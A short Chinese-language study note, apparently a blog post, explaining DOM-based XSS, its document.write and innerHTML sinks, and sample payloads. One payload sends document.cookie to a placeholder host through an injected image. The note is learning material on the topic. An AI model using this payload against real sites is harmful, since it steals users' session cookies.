DOM型XSS学习笔记

DOM,全称是Document Object Model,文档对象模型。
DOM实际上是以面向对象方式描述的文档模型。DOM定义了表示和修改文档所需的对象、这些对象的行为和属性以及这些对象之间的关系。可以把DOM认为是页面上数据和结构的一个树形表示,html页面中的所有标签,完全可以一棵以HTML标签为根节点的树,其他的标签都可以看做它的子孙节点。
所谓的DOM型XSS就是通过在页面中创造或修改DOM元素来达到执行恶意代码的目的的XSS攻击方式,它既可以是一种存储型的XSS也可以是一种反射型的XSS。
文档中的DOM型XSS漏洞
1.使用document.write()直接把内容输出到网页导致XSS漏洞。
2.使用innerHTML直接把内容输出至网页导致XSS漏洞。
当然攻击者也可以自己创建或修改DOM元素来达到攻击的目的
1.通过构建<script>document.write();<script>代码来执行恶意代码。
2.通过构建类似于<script>document.body.innerHTML='';<script>
的代码修改页面DOM元素从而执行恶意代码。
3.通过<script>var img=document.createElement("img");img.src="http://127.0.0.1:XXXX/a?"+escape(document.cookie);</script>类似代码来构建DOM元素从而执行自己的恶意代码。
当然进行DOM型XSS攻击的方法还有好多好多,我这个Js技术不过关的萌新就不在这里一一列举了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值